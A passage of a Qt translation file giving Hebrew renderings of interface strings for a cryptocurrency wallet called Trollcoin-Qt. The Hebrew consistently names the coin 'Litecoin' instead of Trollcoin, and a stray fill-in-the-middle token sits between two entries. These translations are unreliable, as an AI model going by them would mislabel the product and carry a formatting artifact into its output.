<translation>פעולה זו חורגת מגבולות הגודל. עדיין באפשרותך לשלוח אותה תמורת עמלה של %1, המיועדת לצמתים שמעבדים את הפעולה שלך ועוזרת לתמוך ברשת. האם ברצונך לשלם את העמלה?</translation>
</message>
<message>
<location line="-140"/>
<source>Up to date</source>
<translation>עדכני</translation>
</message>
<message>
<location line="+31"/>
<source>Catching up...</source>
<translation>מתעדכן...</translation>
</message>
<message>
<location line="+113"/>
<source>Confirm transaction fee</source>
<translation>אשר עמלת פעולה</translation>
</message>
<message>
<location line="+8"/>
<source>Sent transaction</source>
<translation>פעולה שנשלחה</translation>
</message>
<message>
<location line="+0"/>
<source>Incoming transaction</source>
<translation>פעולה שהתקבלה</translation>
</message>
<message>
<location line="+1"/>
<source>Date: %1
Amount: %2
Type: %3
Address: %4
</source>
<translation>תאריך: %1
כמות: %2
סוג: %3
כתובת: %4</translation>
</message>
<message>
<location line="+33"/>
<location line="+23"/>
<source>URI handling</source>
<translation>תפעול URI</translation>
</message>
<message>
<location line="-23"/>
<location line="+23"/>
<source>URI can not be parsed! This can be caused by an invalid Trollcoin address or malformed URI parameters.</source>
<translation>לא ניתן לנתח URI! זה יכול להיגרם כתוצאה מכתובת לייטקוין לא תקינה או פרמטרי URI חסרי צורה תקינה.</translation>
</message>
<message>
<location line="+17"/>
<source>Wallet is <b>encrypted</b> and currently <b>unlocked</b></source>
<translation>הארנק <b>מוצפן</b> וכרגע <b>פתוח</b></translation>
</message>
<message>
<location line="+8"/>
<source>Wallet is <b>encrypted</b> and currently <b>locked</b></source>
<translation>הארנק <b>מוצפן</b> וכרגע <b>נעול</b></translation>
</message>
<message>
<location filename="../bitcoin.cpp" line="+111"/>
<source>A fatal error occurred. Trollcoin can no longer continue safely and will quit.</source>
<translation>שגיאה סופנית אירעה. לייטקוין אינו יכול להמשיך לפעול בבטחה ולכן ייסגר.</translation>
</message>
</context>
<context>
<name>ClientModel</name>
<message>
<location filename="../clientmodel.cpp" line="+104"/>
<source>Network Alert</source>
<translation>אזעקת רשת</translation>
</message>
</context>
<context>
<name>EditAddressDialog</name>
<message>
<location filename="../forms/editaddressdialog.ui" line="+14"/>
<source>Edit Address</source>
<translation>ערוך כתובת</translation>
</message>
<message>
<location line="+11"/>
<source>&Label</source>
<translation>ת&וית</translation>
</message>
<message>
<location line="+10"/>
<source>The label associated with this address book entry</source>
<translation>התוית המשויכת לרשומה הזו בפנקס הכתובות</translation>
</message>
<message>
<location line="+7"/>
<source>&Address</source>
<translation>&כתובת</translation>
</message>
<message>
<location line="+10"/>
<source>The address associated with this address book entry. This can only be modified for sending addresses.</source>
<translation>הכתובת המשויכת לרשומה זו בפנקס הכתובות. ניתן לשנות זאת רק עבור כתובות לשליחה.</translation>
</message>
<message>
<location filename="../editaddressdialog.cpp" line="+21"/>
<source>New receiving address</source>
<translation>כתובת חדשה לקבלה</translation>
</message>
<message>
<location line="+4"/>
<source>New sending address</source>
<translation>כתובת חדשה לשליחה</translation>
</message>
<message>
<location line="+3"/>
<source>Edit receiving address</source>
<translation>ערוך כתובת לקבלה</translation>
</message>
<message>
<location line="+4"/>
<source>Edit sending address</source>
<translation>ערוך כתובת לשליחה</translation>
</message>
<message>
<location line="+76"/>
<source>The entered address "%1" is already in the address book.</source>
<translation>הכתובת שהכנסת "%1" כבר נמצאת בפנקס הכתובות.</translation>
</message>
<message>
<location line="-5"/>
<source>The entered address "%1" is not a valid Trollcoin address.</source>
<translation>הכתובת שהוכנסה "%1" אינה כתובת לייטקוין תקינה.</translation>
</message>
<message>
<location line="+10"/>
<source>Could not unlock wallet.</source>
<translation>פתיחת הארנק נכשלה.</translation>
</message>
<message>
<location line="+5"/>
<source>New key generation failed.</source>
<translation>יצירת מפתח חדש נכשלה.</translation>
</message>
</context>
<context>
<name>GUIUtil::HelpMessageBox</name>
<message>
<location filename="../guiutil.cpp" line="+424"/>
<location line="+12"/>
<source>Trollcoin-Qt</source>
<translation>Trollcoin-Qt</translation>
</message>
<message>
<location line="-12"/>
<source>version</source>
<translation>גרסה</translation>
</message>
<message>
<location line="+2"/>
<source>Usage:</source>
<translation>שימוש:</translation>
</message>
<message>
<location line="+1"/>
<source>command-line options</source>
<translation>אפשרויות שורת פקודה</translation>
</message>
<message>
<location line="+4"/>
<source>UI options</source>
<translation>אפשרויות ממשק</translation>
</message>
<message>
<location line="+1"/>
<source>Set language, for example "de_DE" (default: system locale)</source>
<translation>קבע שפה, למשל "he_il" (ברירת מחדל: שפת המערכת)</translation>
</message>
<message>
<location line="+1"/>
<source>Start minimized</source>
<translation>התחל ממוזער</translation>
</message>
<message>
<location line="+1"/>
<source>Show splash screen on startup (default: 1)</source>
<translation>הצג מסך פתיחה בעת הפעלה (ברירת מחדל: 1)</translation>
</message>
</context>
<context>
<name>OptionsDialog</name>
<message>
<location filename="../forms/optionsdialog.ui" line="+14"/>
<source>Options</source>
<translation>אפשרויות</translation>
</message>
<message>
<location line="+16"/>
<source>&Main</source>
<translation>ראשי</translation>
</message>
<message>
<location line="+6"/>
<source>Optional transaction fee per kB that helps make sure your transactions are processed quickly. Most transactions are 1 kB.</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+15"/>
<source>Pay transaction &fee</source>
<translation>שלם &עמלת פעולה</translation>
</message>
<message>
<location line="+31"/>
<source>Automatically start Trollcoin after logging in to the system.</source>
<translation>הפעל את לייטקוין באופן עצמאי לאחר התחברות למערכת.</translation>
</message>
<message>
<location line="+3"/>
<source>&Start Trollcoin on system login</source>
<translation>התחל את לייטקוין בעת התחברות למערכת</translation>
</message>
<message>
<location line="+35"/>
<source>Reset all client options to default.</source>
<translation>אפס כל אפשרויות התוכנה לברירת המחדל.</translation>
</message>
<message>
<location line="+3"/>
<source>&Reset Options</source>
<translation>איפוס אפשרויות</translation>
</message>
<message>
<location line="+13"/>
<source>&Network</source>
<translation>רשת</translation>
</message>
<message>
<location line="+6"/>
<source>Automatically open the Trollcoin client port on the router. This only works when your router supports UPnP and it is enabled.</source>
<translation>פתח את פורט לייטקוין בנתב באופן אוטומטי. עובד רק אם UPnP מאופשר ונתמך ע"י הנתב.</translation>
</message>
<message>
<location line="+3"/>
<source>Map port using &UPnP</source>
<translation>מיפוי פורט באמצעות UPnP</translation>
</message>
<message>
<location line="+7"/>
<source>Connect to the Trollcoin network through a SOCKS proxy (e.g. when connecting through Tor).</source>
<translation>התחבר לרשת הלייטקוין דרך פרוקסי SOCKS (למשל בעת התחברות דרך Tor).</translation>
</message>
<message>
<location line="+3"/>
<source>&Connect through SOCKS proxy:</source>
<translation>התחבר דרך פרוקסי SOCKS</translation>
</message>
<message>
<location line="+9"/>
<source>Proxy &IP:</source>
<translation>כתובת IP של פרוקסי:</translation>
</message>
<message>
<location line="+19"/>
<source>IP address of the proxy (e.g. 127.0.0.1)</source>
<translation>כתובת האינטרנט של הפרוקסי (למשל 127.0.0.1)</translation>
</message>
<message>
<location line="+7"/>
<source>&Port:</source>
<translation>פורט:</translation>
</message>
<message>
<location line="+19"/>
<source>Port of the proxy (e.g. 9050)</source>
<translation>הפורט של הפרוקסי (למשל 9050)</translation>
</message>
<message>
<location line="+7"/>
<source>SOCKS &Version:</source>
<translation>גרסת SOCKS:</translation>
</message>
<message>
<location line="+13"/>
<source>SOCKS version of the proxy (e.g. 5)</source>
<translation>גרסת SOCKS של הפרוקסי (למשל 5)</translation>
</message>
<message>
<location line="+36"/>
<source>&Window</source>
<translation>חלון</translation>
</message>
<message>
<location line="+6"/>
<source>Show only a tray icon after minimizing the window.</source>
<translation>הצג סמל מגש בלבד לאחר מזעור החלון.</translation>
</message>
<message>
<location line="+3"/>
<source>&Minimize to the tray instead of the taskbar</source>
<translation>מ&זער למגש במקום לשורת המשימות</translation>
</message>
<message>
<location line="+7"/>
<source>Minimize instead of exit the application when the window is closed. When this option is enabled, the application will be closed only after selecting Quit in the menu.</source>
<translation>מזער את התוכנה במקום לצאת ממנה כשהחלון נסגר. כשאפשרות זו פעילה, התוכנה תיסגר רק לאחר בחירת יציאה מהתפריט.</translation>
</message>
<message>
<location line="+3"/>
<source>M&inimize on close</source>
<translation>מזער בעת סגירה</translation>
</message>
<message>
<location line="+21"/>
<source>&Display</source>
<translation>תצוגה</translation>
</message>
<message>
<location line="+8"/>
<source>User Interface &language:</source>
<translation>שפת ממשק המשתמש:</translation>
</message>
<message>
<location line="+13"/>
<source>The user interface language can be set here. This setting will take effect after restarting Trollcoin.</source>
<translation>ניתן לקבוע כאן את שפת ממשק המשתמש. הגדרה זו תחול לאחר הפעלה מחדש של לייטקוין.</translation>
</message>
<message>
<location line="+11"/>
<source>&Unit to show amounts in:</source>
<translation>יחידת מדידה להצגת כמויות:</translation>
</message>
<message>
<location line="+13"/>
<source>Choose the default subdivision unit to show in the interface and when sending coins.</source>
<translation>בחר את ברירת המחדל ליחידת החלוקה אשר תוצג בממשק ובעת שליחת מטבעות.</translation>
</message>
<message>
<location line="+9"/>
<source>Whether to show Trollcoin addresses in the transaction list or not.</source>
<translation>האם להציג כתובות לייטקוין ברשימת הפעולות או לא.</translation>
</message>
<message>
<location line="+3"/>
<source>&Display addresses in transaction list</source>
<translation>הצג כתובות ברשימת הפעולות</translation>
</message>
<message>
<location line="+71"/>
<source>&OK</source>
<translation>אישור</translation>
</message>
<message>
<location line="+7"/>
<source>&Cancel</source>
<translation>ביטול</translation>
</message>
<message>
<location line="+10"/>
<source>&Apply</source>
<translation>יישום</translation>
</message>
<message>
<location filename="../optionsdialog.cpp" line="+53"/>
<source>default</source>
<translation>ברירת מחדל</translation>
</message>
<message>
<location line="+130"/>
<source>Confirm options reset</source>
<translation>אשר את איפוס האפשרויות</translation>
</message>
<message>
<location line="+1"/>
<source>Some settings may require a client restart to take effect.</source>
<translation>כמה מההגדרות עשויות לדרוש אתחול התוכנה כדי להיכנס לפועל.</translation>
</message>
<message>
<location line="+0"/>
<source>Do you want to proceed?</source>
<translation>האם ברצונך להמשיך?</translation>
</message>
<message>
<location line="+42"/>
<location line="+9"/>
<source>Warning</source>
<translation>אזהרה</translation>
</message>
<message>
<location line="-9"/>
<location line="+9"/>
<source>This setting will take effect after restarting Trollcoin.</source>
<translation>הגדרה זו תחול לאחר הפעלה מחדש של לייטקוין.</translation>
</message>
<message>
<location line="+29"/>
<source>The supplied proxy address is invalid.</source>
<translation>כתובת הפרוקסי שסופקה אינה תקינה.</translation>
</message>
</context>
<context>
<name>OverviewPage</name>
<message>
<location filename="../forms/overviewpage.ui" line="+14"/>
<source>Form</source>
<translation>טופס</translation>
</message>
<message>
<location line="+50"/>
<location line="+166"/>
<source>The displayed information may be out of date. Your wallet automatically synchronizes with the Trollcoin network after a connection is established, but this process has not completed yet.</source>
<translation>המידע המוצג עשוי להיות מיושן. הארנק שלך מסתנכרן באופן אוטומטי עם רשת הלייטקוין לאחר כינון חיבור, אך התהליך טרם הסתיים.</translation>
</message>
<message>
<location line="-124"/>
<source>Balance:</source>
<translation>יתרה:</translation>
</message>
<message>
<location line="+29"/>
<source>Unconfirmed:</source>
<translation>ממתין לאישור:</translation>
</message>
<message>
<location line="-78"/>
<source>Wallet</source>
<translation>ארנק</translation>
</message>
<message>
<location line="+107"/>
<source>Immature:</source>
<translation>לא בשל:</translation>
</message>
<message>
<location line="+13"/>
<source>Mined balance that has not yet matured</source>
<translation>מאזן שנכרה וטרם הבשיל</translation>
</message>
<message>
<location line="+46"/>
<source><b>Recent transactions</b></source>
<translation><b>פעולות אחרונות</b></translation>
</message>
<message>
<location line="-101"/>
<source>Your current balance</source>
<translation>היתרה הנוכחית שלך</translation>
</message>
<message>
<location line="+29"/>
<source>Total of transactions that have yet to be confirmed, and do not yet count toward the current balance</source>
<translation>הסכום הכולל של פעולות שטרם אושרו, ועוד אינן נספרות בחישוב היתרה הנוכחית</translation>
</message>
<message>
<location filename="../overviewpage.cpp" line="+116"/>
<location line="+1"/>
<source>out of sync</source>
<translation>לא מסונכרן</translation>
</message>
</context>
<context>
<name>PaymentServer</name>
<message>
<location filename="../paymentserver.cpp" line="+107"/>
<source>Cannot start trollcoin: click-to-pay handler</source>
<translation>לא ניתן להתחיל את לייטקוין: מפעיל לחץ-לתשלום </translation>
</message>
</context>
<context>
<name>QRCodeDialog</name>
<message>
<location filename="../forms/qrcodedialog.ui" line="+14"/>
<source>QR Code Dialog</source>
<translation>שיח קוד QR</translation>
</message><|fim▁hole|> <location line="+59"/>
<source>Request Payment</source>
<translation>בקש תשלום</translation>
</message>
<message>
<location line="+56"/>
<source>Amount:</source>
<translation>כמות:</translation>
</message>
<message>
<location line="-44"/>
<source>Label:</source>
<translation>תוית:</translation>
</message>
<message>
<location line="+19"/>
<source>Message:</source>
<translation>הודעה:</translation>
</message>
<message>
<location line="+71"/>
<source>&Save As...</source>
<translation>&שמור בשם...</translation>
</message>
<message>
<location filename="../qrcodedialog.cpp" line="+62"/>
<source>Error encoding URI into QR Code.</source>
<translation>שגיאה בקידוד URI לקוד QR</translation>
</message>
<message>
<location line="+40"/>
<source>The entered amount is invalid, please check.</source>
<translation>הכמות שהוכנסה אינה תקינה, אנא ודא.</translation>
</message>
<message>
<location line="+23"/>
<source>Resulting URI too long, try to reduce the text for label / message.</source>
<translation>המזהה המתקבל ארוך מדי, נסה להפחית את הטקסט בתוית / הודעה.</translation>
</message>
<message>
<location line="+25"/>
<source>Save QR Code</source>
<translation>שמור קוד QR</translation>
</message>
<message>
<location line="+0"/>
<source>PNG Images (*.png)</source>
<translation>תמונות PNG (*.png)</translation>
</message>
</context>
<context>
<name>RPCConsole</name>
<message>
<location filename="../forms/rpcconsole.ui" line="+46"/>
<source>Client name</source>
<translation>שם ממשק</translation>
</message>
<message>
<location line="+10"/>
<location line="+23"/>
<location line="+26"/>
<location line="+23"/>
<location line="+23"/>
<location line="+36"/>
<location line="+53"/>
<location line="+23"/>
<location line="+23"/>
<location filename="../rpcconsole.cpp" line="+339"/>
<source>N/A</source>
<translation>N/A</translation>
</message>
<message>
<location line="-217"/>
<source>Client version</source>
<translation>גרסת ממשק</translation>
</message>
<message>
<location line="-45"/>
<source>&Information</source>
<translation>מידע</translation>
</message>
<message>
<location line="+68"/>
<source>Using OpenSSL version</source>
<translation>משתמש ב-OpenSSL גרסה</translation>
</message>
<message>
<location line="+49"/>
<source>Startup time</source>
<translation>זמן אתחול</translation>
</message>
<message>
<location line="+29"/>
<source>Network</source>
<translation>רשת</translation>
</message>
<message>
<location line="+7"/>
<source>Number of connections</source>
<translation>מספר חיבורים</translation>
</message>
<message>
<location line="+23"/>
<source>On testnet</source>
<translation>ברשת הבדיקה</translation>
</message>
<message>
<location line="+23"/>
<source>Block chain</source>
<translation>שרשרת הבלוקים</translation>
</message>
<message>
<location line="+7"/>
<source>Current number of blocks</source>
<translation>מספר הבלוקים הנוכחי</translation>
</message>
<message>
<location line="+23"/>
<source>Estimated total blocks</source>
<translation>מספר כולל משוער של בלוקים</translation>
</message>
<message>
<location line="+23"/>
<source>Last block time</source>
<translation>זמן הבלוק האחרון</translation>
</message>
<message>
<location line="+52"/>
<source>&Open</source>
<translation>פתח</translation>
</message>
<message>
<location line="+16"/>
<source>Command-line options</source>
<translation>אפשרויות שורת פקודה</translation>
</message>
<message>
<location line="+7"/>
<source>Show the Trollcoin-Qt help message to get a list with possible Trollcoin command-line options.</source>
<translation>הצג את הודעה העזרה של trollcoin-qt כדי לקבל רשימה של אפשרויות שורת פקודה של לייטקוין.</translation>
</message>
<message>
<location line="+3"/>
<source>&Show</source>
<translation>הצג</translation>
</message>
<message>
<location line="+24"/>
<source>&Console</source>
<translation>לוח בקרה</translation>
</message>
<message>
<location line="-260"/>
<source>Build date</source>
<translation>תאריך בניה</translation>
</message>
<message>
<location line="-104"/>
<source>Trollcoin - Debug window</source>
<translation>לייטקוין - חלון ניפוי</translation>
</message>
<message>
<location line="+25"/>
<source>Trollcoin Core</source>
<translation>ליבת לייטקוין</translation>
</message>
<message>
<location line="+279"/>
<source>Debug log file</source>
<translation>קובץ יומן ניפוי</translation>
</message>
<message>
<location line="+7"/>
<source>Open the Trollcoin debug log file from the current data directory. This can take a few seconds for large log files.</source>
<translation>פתח את קובץ יומן הניפוי מתיקיית הנתונים הנוכחית. זה עשוי לקחת מספר שניות עבור קובצי יומן גדולים.</translation>
</message>
<message>
<location line="+102"/>
<source>Clear console</source>
<translation>נקה לוח בקרה</translation>
</message>
<message>
<location filename="../rpcconsole.cpp" line="-30"/>
<source>Welcome to the Trollcoin RPC console.</source>
<translation>ברוכים הבאים ללוח בקרת RPC של לייטקוין</translation>
</message>
<message>
<location line="+1"/>
<source>Use up and down arrows to navigate history, and <b>Ctrl-L</b> to clear screen.</source>
<translation>השתמש בחיצים למעלה ולמטה כדי לנווט בהיסטוריה, ו- <b>Ctrl-L</b> כדי לנקות את המסך.</translation>
</message>
<message>
<location line="+1"/>
<source>Type <b>help</b> for an overview of available commands.</source>
<translation>הקלד <b>help</b> בשביל סקירה של הפקודות הזמינות.</translation>
</message>
</context>
<context>
<name>SendCoinsDialog</name>
<message>
<location filename="../forms/sendcoinsdialog.ui" line="+14"/>
<location filename="../sendcoinsdialog.cpp" line="+124"/>
<location line="+5"/>
<location line="+5"/>
<location line="+5"/>
<location line="+6"/>
<location line="+5"/>
<location line="+5"/>
<source>Send Coins</source>
<translation>שלח מטבעות</translation>
</message>
<message>
<location line="+50"/>
<source>Send to multiple recipients at once</source>
<translation>שלח למספר מקבלים בו-זמנית</translation>
</message>
<message>
<location line="+3"/>
<source>Add &Recipient</source>
<translation>הוסף מקבל</translation>
</message>
<message>
<location line="+20"/>
<source>Remove all transaction fields</source>
<translation>הסר את כל השדות בפעולה</translation>
</message>
<message>
<location line="+3"/>
<source>Clear &All</source>
<translation>נקה הכל</translation>
</message>
<message>
<location line="+22"/>
<source>Balance:</source>
<translation>יתרה:</translation>
</message>
<message>
<location line="+10"/>
<source>123.456 BTC</source>
<translation>123.456 לייטקוין</translation>
</message>
<message>
<location line="+31"/>
<source>Confirm the send action</source>
<translation>אשר את פעולת השליחה</translation>
</message>
<message>
<location line="+3"/>
<source>S&end</source>
<translation>שלח</translation>
</message>
<message>
<location filename="../sendcoinsdialog.cpp" line="-59"/>
<source><b>%1</b> to %2 (%3)</source>
<translation><b>%1</b> ל- %2 (%3)</translation>
</message>
<message>
<location line="+5"/>
<source>Confirm send coins</source>
<translation>אשר שליחת מטבעות</translation>
</message>
<message>
<location line="+1"/>
<source>Are you sure you want to send %1?</source>
<translation>האם אתה בטוח שברצונך לשלוח %1?</translation>
</message>
<message>
<location line="+0"/>
<source> and </source>
<translation> ו- </translation>
</message>
<message>
<location line="+23"/>
<source>The recipient address is not valid, please recheck.</source>
<translation>כתובת המקבל אינה תקינה, אנא בדוק שנית.</translation>
</message>
<message>
<location line="+5"/>
<source>The amount to pay must be larger than 0.</source>
<translation>הכמות לשלם חייבת להיות גדולה מ-0.</translation>
</message>
<message>
<location line="+5"/>
<source>The amount exceeds your balance.</source>
<translation>הכמות עולה על המאזן שלך.</translation>
</message>
<message>
<location line="+5"/>
<source>The total exceeds your balance when the %1 transaction fee is included.</source>
<translation>הכמות הכוללת, ובכללה עמלת פעולה בסך %1, עולה על המאזן שלך.</translation>
</message>
<message>
<location line="+6"/>
<source>Duplicate address found, can only send to each address once per send operation.</source>
<translation>כתובת כפולה נמצאה, ניתן לשלוח לכל כתובת רק פעם אחת בכל פעולת שליחה.</translation>
</message>
<message>
<location line="+5"/>
<source>Error: Transaction creation failed!</source>
<translation>שגיאה: יצירת הפעולה נכשלה!</translation>
</message>
<message>
<location line="+5"/>
<source>Error: The transaction was rejected. This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source>
<translation>שגיאה: הפעולה נדחתה. זה עשוי לקרות עם חלק מהמטבעות בארנק שלך כבר נוצלו, למשל אם השתמשת בעותק של wallet.dat ומטבעות נוצלו בעותק אך לא סומנו כמנוצלות כאן.</translation>
</message>
</context>
<context>
<name>SendCoinsEntry</name>
<message>
<location filename="../forms/sendcoinsentry.ui" line="+14"/>
<source>Form</source>
<translation>טופס</translation>
</message>
<message>
<location line="+15"/>
<source>A&mount:</source>
<translation>כ&מות:</translation>
</message>
<message>
<location line="+13"/>
<source>Pay &To:</source>
<translation>שלם &ל:</translation>
</message>
<message>
<location line="+34"/>
<source>The address to send the payment to (e.g. Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</source>
<translation>הכתובת שאליה ישלח התשלום (למשל Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</translation>
</message>
<message>
<location line="+60"/>
<location filename="../sendcoinsentry.cpp" line="+26"/>
<source>Enter a label for this address to add it to your address book</source>
<translation>הכנס תוית לכתובת הזאת כדי להכניס לפנקס הכתובות</translation>
</message>
<message>
<location line="-78"/>
<source>&Label:</source>
<translation>ת&וית:</translation>
</message>
<message>
<location line="+28"/>
<source>Choose address from address book</source>
<translation>בחר כתובת מפנקס הכתובות</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<location line="+7"/>
<source>Paste address from clipboard</source>
<translation>הדבר כתובת מהלוח</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<location line="+7"/>
<source>Remove this recipient</source>
<translation>הסר את המקבל הזה</translation>
</message>
<message>
<location filename="../sendcoinsentry.cpp" line="+1"/>
<source>Enter a Trollcoin address (e.g. Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</source>
<translation>הכנס כתובת לייטקוין (למשל Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</translation>
</message>
</context>
<context>
<name>SignVerifyMessageDialog</name>
<message>
<location filename="../forms/signverifymessagedialog.ui" line="+14"/>
<source>Signatures - Sign / Verify a Message</source>
<translation>חתימות - חתום או אמת הודעה</translation>
</message>
<message>
<location line="+13"/>
<source>&Sign Message</source>
<translation>חתום על הו&דעה</translation>
</message>
<message>
<location line="+6"/>
<source>You can sign messages with your addresses to prove you own them. Be careful not to sign anything vague, as phishing attacks may try to trick you into signing your identity over to them. Only sign fully-detailed statements you agree to.</source>
<translation>אתה יכול לחתום על הודעות עם הכתובות שלך כדי להוכיח שהן בבעלותך. היזהר לא לחתום על משהו מעורפל, שכן התקפות פישינג עשויות לגרום לך בעורמה למסור את זהותך. חתום רק על אמרות מפורטות לחלוטין שאתה מסכים עימן.</translation>
</message>
<message>
<location line="+18"/>
<source>The address to sign the message with (e.g. Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</source>
<translation>הכתובת איתה לחתום על ההודעה (למשל Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</translation>
</message>
<message>
<location line="+10"/>
<location line="+213"/>
<source>Choose an address from the address book</source>
<translation>בחר כתובת מפנקס הכתובות</translation>
</message>
<message>
<location line="-203"/>
<location line="+213"/>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<location line="-203"/>
<source>Paste address from clipboard</source>
<translation>הדבק כתובת מהלוח</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<location line="+12"/>
<source>Enter the message you want to sign here</source>
<translation>הכנס כאן את ההודעה שעליך ברצונך לחתום</translation>
</message>
<message>
<location line="+7"/>
<source>Signature</source>
<translation>חתימה</translation>
</message>
<message>
<location line="+27"/>
<source>Copy the current signature to the system clipboard</source>
<translation>העתק את החתימה הנוכחית ללוח המערכת</translation>
</message>
<message>
<location line="+21"/>
<source>Sign the message to prove you own this Trollcoin address</source>
<translation>חתום על ההודעה כדי להוכיח שכתובת הלייטקוין הזו בבעלותך.</translation>
</message>
<message>
<location line="+3"/>
<source>Sign &Message</source>
<translation>חתום על הודעה</translation>
</message>
<message>
<location line="+14"/>
<source>Reset all sign message fields</source>
<translation>אפס את כל שדות החתימה על הודעה</translation>
</message>
<message>
<location line="+3"/>
<location line="+146"/>
<source>Clear &All</source>
<translation>נקה הכל</translation>
</message>
<message>
<location line="-87"/>
<source>&Verify Message</source>
<translation>אמת הודעה</translation>
</message>
<message>
<location line="+6"/>
<source>Enter the signing address, message (ensure you copy line breaks, spaces, tabs, etc. exactly) and signature below to verify the message. Be careful not to read more into the signature than what is in the signed message itself, to avoid being tricked by a man-in-the-middle attack.</source>
<translation>הכנס למטה את הכתובת החותמת, ההודעה (ודא שאתה מעתיק מעברי שורה, רווחים, טאבים וכו' באופן מדויק) והחתימה כדי לאמת את ההודעה. היזהר לא לפרש את החתימה כיותר ממה שמופיע בהודעה החתומה בעצמה, כדי להימנע מליפול קורבן למתקפת איש-באמצע.</translation>
</message>
<message>
<location line="+21"/>
<source>The address the message was signed with (e.g. Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</source>
<translation>הכתובת איתה ההודעה נחתמה (למשל Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</translation>
</message>
<message>
<location line="+40"/>
<source>Verify the message to ensure it was signed with the specified Trollcoin address</source>
<translation>אמת את ההודעה כדי להבטיח שהיא נחתמה עם כתובת הלייטקוין הנתונה</translation>
</message>
<message>
<location line="+3"/>
<source>Verify &Message</source>
<translation>אימות הודעה</translation>
</message>
<message>
<location line="+14"/>
<source>Reset all verify message fields</source>
<translation>אפס את כל שדות אימות הודעה</translation>
</message>
<message>
<location filename="../signverifymessagedialog.cpp" line="+27"/>
<location line="+3"/>
<source>Enter a Trollcoin address (e.g. Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</source>
<translation>הכנס כתובת לייטקוין (למשל Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</translation>
</message>
<message>
<location line="-2"/>
<source>Click "Sign Message" to generate signature</source>
<translation>לחץ "חתום על ההודעה" כדי לחולל חתימה</translation>
</message>
<message>
<location line="+3"/>
<source>Enter Trollcoin signature</source>
<translation>הכנס חתימת לייטקוין</translation>
</message>
<message>
<location line="+82"/>
<location line="+81"/>
<source>The entered address is invalid.</source>
<translation>הכתובת שהוכנסה אינה תקינה.</translation>
</message>
<message>
<location line="-81"/>
<location line="+8"/>
<location line="+73"/>
<location line="+8"/>
<source>Please check the address and try again.</source>
<translation>אנא בדוק את הכתובת ונסה שנית.</translation>
</message>
<message>
<location line="-81"/>
<location line="+81"/>
<source>The entered address does not refer to a key.</source>
<translation>הכתובת שהוכנסה אינה מתייחסת למפתח.</translation>
</message>
<message>
<location line="-73"/>
<source>Wallet unlock was cancelled.</source>
<translation>פתיחת הארנק בוטלה.</translation>
</message>
<message>
<location line="+8"/>
<source>Private key for the entered address is not available.</source>
<translation>המפתח הפרטי עבור הכתובת שהוכנסה אינו זמין.</translation>
</message>
<message>
<location line="+12"/>
<source>Message signing failed.</source>
<translation>החתימה על ההודעה נכשלה.</translation>
</message>
<message>
<location line="+5"/>
<source>Message signed.</source>
<translation>ההודעה נחתמה.</translation>
</message>
<message>
<location line="+59"/>
<source>The signature could not be decoded.</source>
<translation>לא ניתן לפענח את החתימה.</translation>
</message>
<message>
<location line="+0"/>
<location line="+13"/>
<source>Please check the signature and try again.</source>
<translation>אנא בדוק את החתימה ונסה שנית.</translation>
</message>
<message>
<location line="+0"/>
<source>The signature did not match the message digest.</source>
<translation>החתימה לא תואמת את תקציר ההודעה.</translation>
</message>
<message>
<location line="+7"/>
<source>Message verification failed.</source>
<translation>אימות ההודעה נכשל.</translation>
</message>
<message>
<location line="+5"/>
<source>Message verified.</source>
<translation>ההודעה אומתה.</translation>
</message>
</context>
<context>
<name>SplashScreen</name>
<message>
<location filename="../splashscreen.cpp" line="+22"/>
<source>The Trollcoin developers</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+1"/>
<source>[testnet]</source>
<translation>[רשת-בדיקה]</translation>
</message>
</context>
<context>
<name>TransactionDesc</name>
<message>
<location filename="../transactiondesc.cpp" line="+20"/>
<source>Open until %1</source>
<translation>פתוח עד %1</translation>
</message>
<message>
<location line="+6"/>
<source>%1/offline</source>
<translation>%1/מנותק</translation>
</message>
<message>
<location line="+2"/>
<source>%1/unconfirmed</source>
<translation>%1/ממתין לאישור</translation>
</message>
<message>
<location line="+2"/>
<source>%1 confirmations</source>
<translation>%1 אישורים</translation>
</message>
<message>
<location line="+18"/>
<source>Status</source>
<translation>מצב</translation>
</message>
<message numerus="yes">
<location line="+7"/>
<source>, broadcast through %n node(s)</source>
<translation><numerusform>, הופץ דרך צומת אחד</numerusform><numerusform>, הופץ דרך %n צמתים</numerusform></translation>
</message>
<message>
<location line="+4"/>
<source>Date</source>
<translation>תאריך</translation>
</message>
<message>
<location line="+7"/>
<source>Source</source>
<translation>מקור</translation>
</message>
<message>
<location line="+0"/>
<source>Generated</source>
<translation>נוצר</translation>
</message>
<message>
<location line="+5"/>
<location line="+17"/>
<source>From</source>
<translation>מאת</translation>
</message>
<message>
<location line="+1"/>
<location line="+22"/>
<location line="+58"/>
<source>To</source>
<translation>אל</translation>
</message>
<message>
<location line="-77"/>
<location line="+2"/>
<source>own address</source>
<translation>כתובת עצמית</translation>
</message>
<message>
<location line="-2"/>
<source>label</source>
<translation>תוית</translation>
</message>
<message>
<location line="+37"/>
<location line="+12"/>
<location line="+45"/>
<location line="+17"/>
<location line="+30"/>
<source>Credit</source>
<translation>זיכוי</translation>
</message>
<message numerus="yes">
<location line="-102"/>
<source>matures in %n more block(s)</source>
<translation><numerusform>מבשיל בעוד בלוק אחד</numerusform><numerusform>מבשיל בעוד %n בלוקים</numerusform></translation>
</message>
<message>
<location line="+2"/>
<source>not accepted</source>
<translation>לא התקבל</translation>
</message>
<message>
<location line="+44"/>
<location line="+8"/>
<location line="+15"/>
